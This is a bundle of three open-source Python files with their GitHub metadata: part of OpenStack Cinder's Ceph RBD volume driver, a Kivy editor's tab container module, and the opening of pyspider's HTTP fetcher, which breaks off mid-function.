                'name': '%s/%s' % (self.configuration.rbd_pool,
                                   volume['name']),
                'hosts': hosts,
                'ports': ports,
                'auth_enabled': (self.configuration.rbd_user is not None),
                'auth_username': self.configuration.rbd_user,
                'secret_type': 'ceph',
                'secret_uuid': self.configuration.rbd_secret_uuid, }
        }
        LOG.debug(_('connection data: %s'), data)
        return data
    def terminate_connection(self, volume, connector, **kwargs):
        """No-op: rbd connections need no per-detach teardown."""
        pass
    def _parse_location(self, location):
        """Split an 'rbd://fsid/pool/image/snapshot' URL into its four
        unquoted components; raises ImageUnacceptable otherwise."""
        prefix = 'rbd://'
        if not location.startswith(prefix):
            reason = _('Not stored in rbd')
            raise exception.ImageUnacceptable(image_id=location, reason=reason)
        pieces = map(urllib.unquote, location[len(prefix):].split('/'))
        if any(map(lambda p: p == '', pieces)):
            reason = _('Blank components')
            raise exception.ImageUnacceptable(image_id=location, reason=reason)
        if len(pieces) != 4:
            reason = _('Not an rbd snapshot')
            raise exception.ImageUnacceptable(image_id=location, reason=reason)
        return pieces
    def _get_fsid(self):
        """Return the fsid (unique id) of the connected ceph cluster."""
        with RADOSClient(self) as client:
            return client.cluster.get_fsid()
    def _is_cloneable(self, image_location):
        """True if image_location refers to a readable snapshot in this
        ceph cluster, i.e. we can COW-clone it instead of copying."""
        try:
            fsid, pool, image, snapshot = self._parse_location(image_location)
        except exception.ImageUnacceptable as e:
            LOG.debug(_('not cloneable: %s'), e)
            return False
        if self._get_fsid() != fsid:
            reason = _('%s is in a different ceph cluster') % image_location
            LOG.debug(reason)
            return False
        # check that we can read the image
        try:
            with RBDVolumeProxy(self, image,
                                pool=pool,
                                snapshot=snapshot,
                                read_only=True):
                return True
        except self.rbd.Error as e:
            LOG.debug(_('Unable to open image %(loc)s: %(err)s') %
                      dict(loc=image_location, err=e))
            return False
    def clone_image(self, volume, image_location, image_id):
        """Create a volume as a COW clone of a glance image if possible;
        returns (model_update, cloned) per the VolumeDriver contract."""
        image_location = image_location[0] if image_location else None
        if image_location is None or not self._is_cloneable(image_location):
            return ({}, False)
        prefix, pool, image, snapshot = self._parse_location(image_location)
        self._clone(volume, pool, image, snapshot)
        self._resize(volume)
        return {'provider_location': None}, True
    def _ensure_tmp_exists(self):
        """Create the configured volume_tmp_dir if it does not exist."""
        tmp_dir = self.configuration.volume_tmp_dir
        if tmp_dir and not os.path.exists(tmp_dir):
            os.makedirs(tmp_dir)
    def copy_image_to_volume(self, context, volume, image_service, image_id):
        """Fetch a glance image to a temp file and import it as the volume."""
        self._ensure_tmp_exists()
        tmp_dir = self.configuration.volume_tmp_dir
        with tempfile.NamedTemporaryFile(dir=tmp_dir) as tmp:
            image_utils.fetch_to_raw(context, image_service, image_id,
                                     tmp.name)
            # The placeholder volume is replaced by the imported image.
            self.delete_volume(volume)
            # keep using the command line import instead of librbd since it
            # detects zeroes to preserve sparseness in the image
            args = ['rbd', 'import',
                    '--pool', self.configuration.rbd_pool,
                    tmp.name, volume['name']]
            if self._supports_layering():
                args.append('--new-format')
            args.extend(self._ceph_args())
            self._try_execute(*args)
        self._resize(volume)
    def copy_volume_to_image(self, context, volume, image_service, image_meta):
        """Export the volume to a temp file and upload it to glance."""
        self._ensure_tmp_exists()
        tmp_dir = self.configuration.volume_tmp_dir or '/tmp'
        tmp_file = os.path.join(tmp_dir,
                                volume['name'] + '-' + image_meta['id'])
        with fileutils.remove_path_on_error(tmp_file):
            args = ['rbd', 'export',
                    '--pool', self.configuration.rbd_pool,
                    volume['name'], tmp_file]
            args.extend(self._ceph_args())
            self._try_execute(*args)
            image_utils.upload_volume(context, image_service,
                                      image_meta, tmp_file)
        os.unlink(tmp_file)
    def backup_volume(self, context, backup, backup_service):
        """Create a new backup from an existing volume."""
        volume = self.db.volume_get(context, backup['volume_id'])
        pool = self.configuration.rbd_pool
        with RBDVolumeProxy(self, volume['name'], pool) as rbd_image:
            # Wrap the image so the backup service can use file-like IO.
            rbd_meta = RBDImageMetadata(rbd_image, self.configuration.rbd_pool,
                                        self.configuration.rbd_user,
                                        self.configuration.rbd_ceph_conf)
            rbd_fd = RBDImageIOWrapper(rbd_meta)
            backup_service.backup(backup, rbd_fd)
        LOG.debug(_("volume backup complete."))
    def restore_backup(self, context, backup, volume, backup_service):
        """Restore an existing backup to a new or existing volume."""
        pool = self.configuration.rbd_pool
        with RBDVolumeProxy(self, volume['name'], pool) as rbd_image:
            rbd_meta = RBDImageMetadata(rbd_image, self.configuration.rbd_pool,
                                        self.configuration.rbd_user,
                                        self.configuration.rbd_ceph_conf)
            rbd_fd = RBDImageIOWrapper(rbd_meta)
            backup_service.restore(backup, volume['id'], rbd_fd)
        LOG.debug(_("volume restore complete."))
    def extend_volume(self, volume, new_size):
        """Extend an existing volume."""
        old_size = volume['size']
        try:
            size = int(new_size) * units.GiB
            self._resize(volume, size=size)
        except Exception:
            msg = _('Failed to Extend Volume '
                    '%(volname)s') % {'volname': volume['name']}
            LOG.error(msg)
            raise exception.VolumeBackendAPIException(data=msg)
        LOG.debug(_("Extend volume from %(old_size)s GB to %(new_size)s GB."),
                  {'old_size': old_size, 'new_size': new_size})
|
{
"content_hash": "59c85485ce8a883404bf681347050c9e",
"timestamp": "",
"source": "github",
"line_count": 805,
"max_line_length": 79,
"avg_line_length": 38.54782608695652,
"alnum_prop": 0.5549611678643936,
"repo_name": "cloudbau/cinder",
"id": "ddcf16dcde07adee8d67c1571f6b842ed6899a84",
"size": "31646",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "cinder/volume/drivers/rbd.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Python",
"bytes": "5235714"
},
{
"name": "Shell",
"bytes": "8994"
}
],
"symlink_target": ""
}
|
"""
editorcontainer
==================
**Module**: ``editorcontainer.editorcontainer.py``
Module that contains all that's necessary to create
the file tabs
"""
import os
import math
from kivy.uix.boxlayout import BoxLayout
from kivy.properties import ObjectProperty
from kivy.properties import StringProperty
from kivy.uix.tabbedpanel import TabbedPanelHeader
from kivy.uix.tabbedpanel import TabbedPanel
from kivy.uix.button import Button
from kivy.uix.widget import Widget
from kivy.clock import Clock
from kivy.core.window import Window
from kivy.properties import BooleanProperty
from kivy.uix.scrollview import ScrollView
from editorcontainer.editor.editor import Editor
from editorcontainer.rightclickmenu.rightclickmenu import RightClickMenu
from confirmationdialog.confirmationdialog import ConfirmationDialog
class CodeScrollView(ScrollView):
    """A :py:class:`kivy.uix.scrollview.ScrollView` that contains the
    editor and line numbers.
    The purpose of this class is to make the line numbers and editor
    scrollable together.
    """
    line_numbers_strip = ObjectProperty(None)
    """:py:class:`kivy.properties.ObjectProperty` reference to the line
    numbers widget, of type :py:class:`~editorcontainer.editor.editor.Editor`
    """
    editor = ObjectProperty(None)
    """:py:class:`kivy.properties.ObjectProperty` reference to the editor
    widget, of type :py:class:`~editorcontainer.editor.editor.Editor`
    """
    layout = ObjectProperty(None)
    """Reference to the layout that is the content of this :py:class:`.CodeScrollView`.
    It contains the :py:attr:`.editor` and :py:attr:`.line_numbers_strip`
    """
    show_line_numbers = BooleanProperty(True)
    """:py:class:`kivy.properties.BooleanProperty` that indicates whether this
    :py:class:`.CodeScrollView` should display the line numbers (:py:obj:`True`)
    or not (:py:obj:`False`). Defaults to :py:obj:`True`.
    """
    def __init__(self, **kwargs):
        """Call __init__ from super and decide whether to show the line numbers."""
        super(CodeScrollView, self).__init__(**kwargs)
        self.max_num_of_lines = 0
        """Maximum number of lines currently known.
        It will increase depending on the quantity of lines in the editor.
        Generally, it increases when 'enter' is pressed (a new line is added).
        Defaults to 0.
        """
        self.scroll_distance = self.editor.line_height
        self.editor.bind(focus=self.on_editor_focus)
        parent = self.line_numbers_strip.parent
        if not self.show_line_numbers:
            parent.remove_widget(self.line_numbers_strip)
        else:
            # Only track line changes when the numbers strip is visible.
            self.editor.bind(_lines=self.on_lines_change)
    def on_editor_focus(self, widget, value):
        """Bind or unbind the keyboard/mouse handlers depending on editor focus.

        Binds :py:meth:`.on_keyboard` and :py:meth:`.on_mouse_down` to the
        corresponding :py:class:`kivy.core.window.Window` events while the
        editor has focus, and removes both when focus is lost.

        :param widget: Instance of the :py:attr:`kivy.uix.widget` on which the event occurred (:py:attr:`.editor`).
        :param value: Value of the property of the event (:py:attr:`.editor.focus` in this case).
        """
        if value:
            Window.bind(on_keyboard=self.on_keyboard)
            Window.bind(on_mouse_down=self.on_mouse_down)
        else:
            Window.unbind(on_keyboard=self.on_keyboard)
            # BUG FIX: this previously passed on_keyboard=self.on_mouse_down,
            # so the mouse handler was never unbound and stayed attached
            # after every focus loss, stacking stale handlers on the Window.
            Window.unbind(on_mouse_down=self.on_mouse_down)
    def on_mouse_down(self, mouse, x, y, button, modifiers):
        """Manage event when some mouse button is used.
        For example, when the middle mouse button is used to scroll,
        the cursor is repositioned here.

        :param mouse: Instance of the mouse listener.
        :param x: x position of the mouse.
        :param y: y position of the mouse.
        :param button: Mouse button pressed ('left', 'right', 'scrollup', ...)
        :param modifiers: Modifiers used for the mouse press ('ctrl', 'alt', ...)
        """
        self.editor.last_click = button
        # In any case, remove a right click menu if there is one
        rc_menu = self.editor_container.right_click_menu
        if rc_menu is not None and rc_menu in Window.children:
            top = Window.size[1] - (rc_menu.y + rc_menu.height)
            bottom = (top + rc_menu.height - 10)  # TODO find a way to remove this 10
            # It's in the widget and I don't know why (in the widget in rightclickmenu.kv)
            if ((x < rc_menu.x or x > rc_menu.width + rc_menu.x)
                    or (y < top or y > bottom) or button == 'right'):
                Window.remove_widget(rc_menu)
        # To show right click menu, let's brute force this.
        # It calculates if the click is inside the visible area
        # of the editor.
        if button == 'right':
            self.editor.text_from = self.editor._selection_from
            self.editor.text_to = self.editor._selection_to
            c_y = self.editor_container.y
            c_h = self.editor_container.height
            top = (Window.size[1] - c_y
                   - c_h + self.editor_container._tab_layout.height)
            bottom = c_h + self.editor_container.parent.menu_bar.height
            editor = self.editor_container.current_tab.content.editor
            e_x = editor.x
            e_w = editor.x + editor.width
            if (len(self.editor_container.tab_list) > 0
                    and (x >= e_x and x < e_w)
                    and (y >= top and y <= bottom)):
                self.editor_container.open_right_click_menu(x + 15, y)
        # Middle-button scrolling: keep the cursor inside the visible area.
        if button == 'scrollup':
            editor = self.editor
            y_pos = math.floor(self.scroll_y
                               * float(self.viewport_size[1] - self.height))
            new_col, new_row = editor.get_cursor_from_xy(self.scroll_x,
                                                         y_pos)
            editor.cursor = (editor.cursor_col, new_row)
        if button == 'scrolldown':
            editor = self.editor
            y_pos = math.floor(self.scroll_y
                               * float(self.viewport_size[1]
                                       - self.height))
            new_col, new_row = editor.get_cursor_from_xy(self.scroll_x,
                                                         y_pos + self.height)
            editor.cursor = (editor.cursor_col, new_row)
    def on_keyboard(self, keyboard, keycode, scancode, value, modifiers):
        """Manage keyboard events (on :py:attr:`.editor`).
        It controls whether it should save the file (ctrl-s), etc.

        :param keyboard: Instance of the keyboard manager.
        :param keycode: Int that represents the pressed key.
        :param scancode: Extra code (not used).
        :param value: Value of the pressed key, as a :py:obj:`str`.
        :param modifiers: List of pressed modifiers (such as 'ctrl', 'alt'...)
        """
        # ctrl-s to save
        if keycode == 115 and value == 's':
            if 'ctrl' in modifiers and len(modifiers) == 1:
                self.editor.save_tab()
        # To fix the up and down keys navigation, keycode for up key
        # is 273 and for down key is 274
        if keycode == 274:
            self.key_down()
        if keycode == 273:
            self.key_up()
    def key_down(self):
        """Scroll down one line when the cursor moves below the visible area
        after pressing the 'down' key, if needed."""
        y_pos = self.editor.cursor_pos[1]
        line_height = self.editor.line_height
        traveled = math.floor(self.scroll_y * float(self.viewport_size[1] - self.height))
        if self.viewport_size[1] > traveled:
            inverse_traveled = self.viewport_size[1] - traveled
        else:
            inverse_traveled = 0
        inverse_y_pos = self.viewport_size[1] - y_pos
        if (inverse_y_pos + line_height) > inverse_traveled:
            # Normalize the quantity to be between 0 and 1
            normalized = self.convert_distance_to_scroll(0, line_height)
            # Reposition the scroll, clamped to the valid [0, 1] range.
            new_scroll_y = self.scroll_y - normalized[1]
            if new_scroll_y >= 0:
                self.scroll_y = new_scroll_y
            else:
                self.scroll_y = 0
    def key_up(self):
        """Scroll up one line when the cursor moves above the visible area
        after pressing the 'up' key, if needed."""
        y_pos = self.editor.cursor_pos[1]
        line_height = self.editor.line_height
        traveled = math.floor(self.scroll_y
                              * float(self.viewport_size[1] - self.height))
        if y_pos > (traveled + self.height):
            # Normalize the quantity to be between 0 and 1
            normalized = self.convert_distance_to_scroll(0, line_height)
            # Reposition the scroll, clamped to the valid [0, 1] range.
            new_scroll_y = self.scroll_y + normalized[1]
            if new_scroll_y <= 1:
                self.scroll_y = new_scroll_y
            else:
                self.scroll_y = 1
    def on_lines_change(self, widget, value):
        """Manage event when :py:attr:`editor._lines` changes.
        Requests an update on the line numbers depending on the situation.

        :param widget: Instance of the :py:attr:`kivy.uix.widget` on which the event occurred (:py:attr:`.editor`).
        :param value: Value of :py:attr:`.editor._lines` after it changed.
        """
        n = len(value)
        if n > self.max_num_of_lines:
            self.update_lines_number(self.max_num_of_lines, n)
    def on_show_line_numbers(self, widget, value):
        """Manage event when :py:attr:`.show_line_numbers` changes.

        :param widget: :py:attr:`kivy.uix.widget` on which the event occurred (this :py:class:`.CodeScrollView`).
        :param value: Value of :py:attr:`.show_line_numbers` after the change.
        """
        if value:
            # Make the strip wide enough for the largest line number.
            max_num_l = str(self.max_num_of_lines)
            _get_extents = self.line_numbers_strip._label_cached.get_extents
            padding = self.line_numbers_strip.padding[0] * 2
            self.line_numbers_strip.width = (_get_extents(str(max_num_l))[0]
                                             + padding)
        else:
            self.line_numbers_strip.width = 0
    def update_lines_number(self, old, new):
        """Update the lines number.
        When the number of lines increases, the line numbers should be updated
        using this method (this method is called by :py:meth:`.on_lines_change`).

        :param old: Old number of lines
        :param new: New number of lines
        """
        self.max_num_of_lines = new
        lines = [str(i) for i in range(old + 1, new + 1)]
        self.line_numbers_strip.text += '\n'.join(lines) + '\n'
        # Grow the strip so the widest line number still fits.
        max_num_l = str(self.max_num_of_lines)
        _get_extents = self.line_numbers_strip._label_cached.get_extents
        padding = self.line_numbers_strip.padding[0] * 2
        self.line_numbers_strip.width = (_get_extents(str(max_num_l))[0]
                                         + padding)
class EditorContainer(TabbedPanel):
    """Container of editor tabs: one tab per open (or new) file.

    Each tab consists of an :py:class:`.EditorTab` header and a content,
    which is a :py:class:`.CodeScrollView`.
    """

    right_click_menu = None
    """Stores the :py:class:`editorcontainer.rightclickmenu.rightclickmenu.RightClickMenu`
    to use in the application."""

    def __init__(self, **kwargs):
        # Forward **kwargs so construction arguments reach TabbedPanel
        # (the previous code silently dropped them).
        super(EditorContainer, self).__init__(**kwargs)

        self.default_tab_mimetype = None
        """Stores the mimetype (of a file) of a default tab.
        Used to store the mimetype of a file that is opened directly with the
        application (from 'console'). Defaults to :py:obj:`None`.
        """

        self.default_tab_file_path = None
        """Stores the path (to a file) of a default tab.
        Used to store the path of a file that is opened directly with the application
        (from 'console'). Defaults to :py:obj:`None`.
        """

        # Bind current_tab to disable the unused editors
        # and enable the current one.
        self.bind(current_tab=self.disable_tabs)

    def add_new_tab(self, mime_type=None, tab_name=None):
        """Add a new tab.

        The contents of the added tab depend on ``mime_type`` and
        ``tab_name``. The tab is added to this :py:class:`.EditorContainer`.
        The 'text' attribute of the :py:class:`editorcontainer.editor.editor.Editor`
        is bound to its method
        :py:meth:`editorcontainer.editor.editor.Editor.text_changed` if a blank
        new tab is created (loaded files are bound in :py:meth:`.build_tab`).

        :param mime_type: Mimetype of the file to open (contents of the new
            tab). Defaults to :py:obj:`None` if no file will be opened.
        :param tab_name: Name to put in the tab header. It's the name of the
            file. Defaults to :py:obj:`None`.
        :return: The created tab, an :py:class:`.EditorTab`.
        """
        editor_tab = EditorTab()
        editor_content = CodeScrollView()
        editor_content.editor_container = self
        editor_tab.content = editor_content
        editor_tab.change_tab_name(tab_name)
        self.add_widget(editor_tab)
        editor_content.editor.tab = editor_tab
        #TODO Change this to 'self.switch_to(editor, do_scroll=True)
        # when kivy 1.9.2 releases
        self.switch_to(editor_tab)
        editor = editor_tab.content.editor
        editor.propagate_editor_container(self)
        if tab_name is None:
            # NOTE(review): assigning ' ' and then '' looks like a hack to
            # force an initial refresh of the editor widget -- confirm
            # before removing.
            editor.text = ' '
            editor.text = ''
            editor.bind(text=editor.text_changed)
        self.footer_visibility()
        return editor_tab

    def disable_tabs(self, widget, value):
        """Manage the event when ``current_tab`` changes.

        Enables the editor of the tab the user switched to and disables
        all the others.
        """
        for tab in self.tab_list:
            tab.content.editor.disabled = True
        widget.current_tab.content.editor.disabled = False

    def build_default_tab(self):
        """Build a default tab (the tab created when the application opens).

        The default type depends on :py:attr:`.default_tab_file_path` and
        :py:attr:`.default_tab_mimetype`. If those attributes are
        :py:obj:`None` a blank new tab will be created, otherwise a tab with
        the contents of :py:attr:`.default_tab_file_path` highlighted for
        :py:attr:`.default_tab_mimetype` will be created.
        """
        self.build_tab(self.default_tab_file_path, self.default_tab_mimetype)

    def build_tab(self, file_path=None, mime_type=None):
        """Build a tab for ``file_path`` with mimetype ``mime_type``.

        The tab name is extracted from ``file_path`` (the file name including
        its extension), unless it's :py:obj:`None`. If both parameters are
        :py:obj:`None` -- or the file cannot be read -- a blank new tab is
        created instead. The editor's 'text' attribute is bound to
        :py:meth:`editorcontainer.editor.editor.Editor.text_changed` once the
        content has been loaded.

        :param file_path: Path of the file to open. Defaults to :py:obj:`None`.
        :param mime_type: Mimetype of the file to open. Defaults to :py:obj:`None`.
        """
        text = ''
        dir_path = None
        file_name = None

        if file_path is not None:
            try:
                with open(file_path) as file:
                    text = file.read()
            except PermissionError as err:
                # BUGFIX: previously referenced the undefined name `path`
                # here, which raised NameError instead of printing the
                # intended message.
                print(err, "You don't have the required access rights"
                      " to read: {0}".format(file_path), sep='\n')
                dir_path = mime_type = file_name = file_path = None
            except FileNotFoundError as err:
                print(err, "{}: not found".format(file_path), sep='\n')
                dir_path = mime_type = file_name = file_path = None
            except IsADirectoryError as err:
                print(err, "Cannot open a directory", sep='\n')
                dir_path = mime_type = file_name = file_path = None
            else:
                dir_path, file_name = os.path.split(file_path)

        editor_tab = self.add_new_tab(mime_type, file_name)

        editor = editor_tab.content.editor
        editor._name = file_name
        editor._path = dir_path
        editor.text = text

        name = editor.change_lexer(mime_type)
        self.parent.footer.change_information({'highlight_menu': name})
        editor.bind(text=editor.text_changed)

    def footer_visibility(self):
        """If there are no open tabs remove the footer from the GUI;
        when the first tab appears, add it back."""
        container = self.parent
        if len(self.tab_list) == 0:
            container.remove_widget(container.footer)
        elif len(self.tab_list) == 1:
            if container.footer not in container.children:
                container.add_widget(container.footer)

    def open_right_click_menu(self, x, y):
        """Open the right click menu.

        The menu is added to :py:class:`kivy.core.window.Window`.

        :param x: x position to place the menu.
        :param y: y position to place the menu.
        """
        # Window y coordinates are flipped relative to touch coordinates.
        inv_y = Window.height - y
        rc_menu = self.right_click_menu
        if rc_menu is not None:
            rc_menu.pos = (x, inv_y - rc_menu.height)
        else:
            # Lazily create and cache the menu on first use.
            rc_menu = RightClickMenu()
            rc_menu.pos = (x, inv_y - rc_menu.height)
            self.right_click_menu = rc_menu

        rc_menu.editor = self.current_tab.content.editor
        Window.add_widget(rc_menu)
class EditorTab(TabbedPanelHeader):
    """Tab header of a tab to add to the :py:class:`.EditorContainer`.

    It displays the name of the tab (which can be the name of the file
    opened by that tab or the default, established in the related *.kv* file).
    """

    close_button = ObjectProperty(None)
    """An :py:class:`kivy.properties.ObjectProperty` that's a reference
    to the button to close the tab (the button is in the :py:class:`.EditorTab`).
    """

    close_button_string = StringProperty('x')
    """Text to display in the :py:attr:`.close_button`.
    It's a :py:class:`kivy.properties.StringProperty` and defaults to 'x'.
    This attribute's value will change when a change to the text of the
    :py:class:`editorcontainer.editor.editor.Editor` occurs and display an
    asterisk (*) on top of it.
    """

    label = ObjectProperty(None)
    """Label to place the name of the tab"""

    def __init__(self, **kwargs):
        """Calls super's __init__ and binds texture_size of
        :py:attr:`.label` to :py:meth:`.on_label_texture_size`."""
        super(EditorTab, self).__init__(**kwargs)
        self.label.bind(texture_size=self.on_label_texture_size)

        self.saved = True
        """Indicates if the contents of the tab were already saved (after a change).
        True = saved
        False = unsaved
        """

    def close_tab_question(self, widget, value):
        """Close the tab if the confirmation dialog was answered 'yes'.

        :param widget: Widget on which the event occurred \
        (a :py:class:`confirmationdialog.confirmationdialog.ConfirmationDialog`).
        :param value: Value after the change (the value of widget.answered).
        """
        if value:
            self.close_editor_tab(saved=True)

    def close_editor_tab(self, saved=False):
        """Close this :py:class:`.EditorTab`.

        Asks for confirmation first when there are unsaved changes; otherwise
        removes the tab and determines to which tab to move (if any remain).

        :param saved: When True, skip the unsaved-changes confirmation.
        """
        if not self.saved and not saved:
            # Unsaved changes: ask first. close_tab_question calls back
            # with saved=True when the user confirms.
            description = 'This tab has unsaved changes'
            question = 'Do you want to close it without saving?'
            confirmation_dialog = ConfirmationDialog(description,
                                                     question)
            confirmation_dialog.open()
            confirmation_dialog.bind(answered=self.close_tab_question)
        else:
            parent_panel = self.parent.tabbed_panel
            # Save the position to change tabs
            # (in theory to the one on the left).
            switch_index = parent_panel.tab_list.index(self)
            # Remember whether this tab was the current one.
            was_current = self is parent_panel.current_tab
            parent_panel.remove_widget(self)
            self.content.opacity = 0

            # Find out if it's possible to change to another tab,
            # then change to it.
            tab_list_len = len(parent_panel.tab_list)
            if tab_list_len > 0:
                # Only necessary if the closed tab was the 'current_tab'.
                if was_current:
                    # Calculate the position to switch to.
                    if switch_index != tab_list_len:
                        switch_index = switch_index % tab_list_len
                    else:
                        switch_index = tab_list_len - 1
                    parent_panel.switch_to(parent_panel.tab_list[switch_index])

            # Tell the EditorContainer to remove the footer if there are no
            # more open tabs.
            parent_panel.footer_visibility()

    def change_tab_name(self, name=None):
        """Change the name of this :py:class:`.EditorTab`. The name is what's
        displayed in the tab header (that is, this :py:class:`.EditorTab`)."""
        if name is not None:
            self.label.text = name

    def on_label_texture_size(self, widget, value):
        """Manage event when texture_size changes in :py:attr:`.label`.

        The width of the tab is changed accordingly to fit the tab name.

        :param widget: Widget on which the event occurred (:py:attr:`.label`).
        :param value: Value of texture_size after it changed.
        """
        double_padding = 2 * self.label.padding_x
        self.label.width = self.label.texture_size[0] + double_padding
        self.width = self.close_button.width + self.label.width
|
{
"content_hash": "578380cd7f0bc3d16a39df8ce1b155ed",
"timestamp": "",
"source": "github",
"line_count": 630,
"max_line_length": 135,
"avg_line_length": 38.7,
"alnum_prop": 0.5503055658094418,
"repo_name": "Errantgod/azaharTEA",
"id": "43728d005d0219cb673470a9a0cdb72538f580b0",
"size": "24381",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "editorcontainer/editorcontainer.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "77665"
}
],
"symlink_target": ""
}
|
import time
import json
import Queue
import logging
import threading
import cookie_utils
import tornado.ioloop
import tornado.httputil
import tornado.httpclient
from tornado.curl_httpclient import CurlAsyncHTTPClient
from tornado.simple_httpclient import SimpleAsyncHTTPClient
from pyspider.libs import dataurl, counter
logger = logging.getLogger('fetcher')
class MyCurlAsyncHTTPClient(CurlAsyncHTTPClient):
    """Curl-based async HTTP client that exposes pool-usage counters."""

    def size(self):
        """Number of curl handles currently in use."""
        in_use = len(self._curls) - self.free_size()
        return in_use

    def free_size(self):
        """Number of idle curl handles left in the pool."""
        return len(self._free_list)
class MySimpleAsyncHTTPClient(SimpleAsyncHTTPClient):
    """Pure-python async HTTP client exposing the same pool counters."""

    def size(self):
        """Number of requests currently in flight."""
        return len(self.active)

    def free_size(self):
        """Remaining request slots before max_clients is reached."""
        remaining = self.max_clients - self.size()
        return remaining
# Shape of the result dict produced by the fetchers (field name -> type).
# NOTE(review): appears to be informational only -- no runtime use is
# visible in this module; confirm before relying on it.
fetcher_output = {
    "status_code": int,
    "orig_url": str,
    "url": str,
    "headers": dict,
    "content": str,
    "cookies": dict,
}
class Fetcher(object):
user_agent = "pyspider/master (+http://pyspider.org/)"
default_options = {
'method': 'GET',
'headers': {},
'timeout': 120,
}
phantomjs_proxy = None
def __init__(self, inqueue, outqueue, poolsize=10, proxy=None, async=True):
self.inqueue = inqueue
self.outqueue = outqueue
self.poolsize = poolsize
self._running = False
self._quit = False
self.proxy = proxy
self.async = async
if async:
self.http_client = MyCurlAsyncHTTPClient(max_clients=self.poolsize)
else:
self.http_client = tornado.httpclient.HTTPClient(MyCurlAsyncHTTPClient, max_clients=self.poolsize)
self._cnt = {
'5m': counter.CounterManager(
lambda : counter.TimebaseAverageWindowCounter(30, 10)),
'1h': counter.CounterManager(
lambda : counter.TimebaseAverageWindowCounter(60, 60)),
}
def send_result(self, type, task, result):
"""type in ('data', 'http')"""
if self.outqueue:
try:
self.outqueue.put((task, result))
except Exception, e:
logger.exception(e)
def fetch(self, task, callback=None):
url = task.get('url', 'data:,')
if callback is None:
callback = self.send_result
if url.startswith('data:'):
return self.data_fetch(url, task, callback)
elif task.get('fetch', {}).get('fetch_type') in ('js', 'phantomjs'):
return self.phantomjs_fetch(url, task, callback)
else:
return self.http_fetch(url, task, callback)
def sync_fetch(self, task):
wait_result = threading.Condition()
_result = {}
def callback(type, task, result):
wait_result.acquire()
_result['type'] = type
_result['task'] = task
_result['result'] = result
wait_result.notify()
wait_result.release()
self.fetch(task, callback=callback)
wait_result.acquire()
while 'result' not in _result:
wait_result.wait()
wait_result.release()
return _result['result']
def data_fetch(self, url, task, callback):
self.on_fetch('data', task)
result = {}
result['orig_url'] = url
result['content'] = dataurl.decode(url)
result['headers'] = {}
result['status_code'] = 200
result['url'] = url
result['cookies'] = {}
result['time'] = 0
result['save'] = task.get('fetch', {}).get('save')
if len(result['content']) < 70:
logger.info("[200] %s 0s", url)
else:
logger.info("[200] data:,%s...[content:%d] 0s", result['content'][:70], len(result['content']))
callback('data', task, result)
self.on_result('data', task, result)
return task, result
allowed_options = ['method', 'data', 'timeout', 'allow_redirects', 'cookies']
def http_fetch(self, url, task, callback):
self.on_fetch('http', task)
fetch = dict(self.default_options)
fetch.setdefault('url', url)
fetch.setdefault('headers', {})
fetch.setdefault('allow_redirects', True)
fetch.setdefault('use_gzip', True)
fetch['headers'].setdefault('User-Agent', self.user_agent)
task_fetch = task.get('fetch', {})
for each in self.allowed_options:
if each in task_fetch:
fetch[each] = task_fetch[each]
fetch['headers'].update(task_fetch.get('headers', {}))
track_headers = task.get('track', {}).get('fetch', {}).get('headers', {})
#proxy
if 'proxy' in task_fetch:
if isinstance(task_fetch['proxy'], basestring):
fetch['proxy_host'] = task_fetch['proxy'].split(":")[0]
fetch['proxy_port'] = int(task_fetch['proxy'].split(":")[1])
elif self.proxy and task_fetch.get('proxy', True):
fetch['proxy_host'] = self.proxy.split(":")[0]
fetch['proxy_port'] = int(self.proxy.split(":")[1])
#etag
if task_fetch.get('etag', True):
_t = task_fetch.get('etag') if isinstance(task_fetch.get('etag'), basestring) \
else track_headers.get('etag')
if _t:
fetch['headers'].setdefault('If-None-Match', _t)
#last modifed
if task_fetch.get('last_modified', True):
_t = task_fetch.get('last_modifed') \
if isinstance(task_fetch.get('last_modifed'), basestring) \
else track_headers.get('last-modified')
if _t:
fetch['headers'].setdefault('If-Modifed-Since', _t)
#fix for tornado request obj
if 'allow_redirects' in fetch:
fetch['follow_redirects'] = fetch['allow_redirects']
del fetch['allow_redirects']
if 'timeout' in fetch:
fetch['connect_timeout'] = fetch['timeout']
fetch['request_timeout'] = fetch['timeout']
del fetch['timeout']
if 'data' in fetch:
fetch['body'] = fetch['data']
del fetch['data']
cookie = None
if 'cookies' in fetch:
cookie = fetch['cookies']
del fetch['cookies']
def handle_response(response):
response.headers = final_headers
session.extract_cookies_to_jar(request, cookie_headers)
if response.error and not isinstance(response.error, tornado.httpclient.HTTPError):
result = {
'status_code': 599,
'error': "%r" % response.error,
'content': "",
'time': time.time() - start_time,
'orig_url': url,
'url': url,
}
callback('http', task, result)
self.on_result('http', task, result)
return task, result
result = {}
result['orig_url'] = url
result['content'] = response.body or ''
result['headers'] = dict(response.headers)
result['status_code'] = response.code
result['url'] = response.effective_url or url
result['cookies'] = session.to_dict()
result['time'] = time.time() - start_time
result['save'] = task_fetch.get('save')
if 200 <= response.code < 300:
logger.info("[%d] %s %.2fs", response.code, url, result['time'])
else:
logger.warning("[%d] %s %.2fs", response.code, url, result['time'])
callback('http', task, result)
self.on_result('http', task, result)
return task, result
def header_callback(line):
line = line.strip()
if line.startswith("HTTP/"):
final_headers.clear()
return
if not line:
return
final_headers.parse_line(line)
cookie_headers.parse_line(line)
start_time = time.time()
session = cookie_utils.CookieSession()
cookie_headers = tornado.httputil.HTTPHeaders()
final_headers = tornado.httputil.HTTPHeaders()
try:
request = tornado.httpclient.HTTPRequest(header_callback=header_callback, **fetch)
if cookie:
session.update(cookie)
if 'Cookie' in request.headers:
del request.headers['Cookie']
request.headers['Cookie'] = session.get_cookie_header(request)
if self.async:
response = self.http_client.fetch(request, handle_response)
else:
return handle_response(self.http_client.fetch(request))
except tornado.httpclient.HTTPError as e:
return handle_response(e.response)
except Exception as e:
raise
result = {
'status_code': 599,
'error': '%r' % e,
'content': "",
'time': time.time() - start_time,
'orig_url': url,
'url': url,
}
logger.error("[599] %s, %r %.2fs", url, e, result['time'])
callback('http', task, result)
self.on_result('http', task, result)
return task, result
phantomjs_adding_options = ['js_run_at', 'js_script', 'load_images']
def phantomjs_fetch(self, url, task, callback):
self.on_fetch('phantomjs', task)
if not self.phantomjs_proxy:
result = {
"orig_url": url,
"content": "phantomjs is not enabled.",
"headers": {},
"status_code": 501,
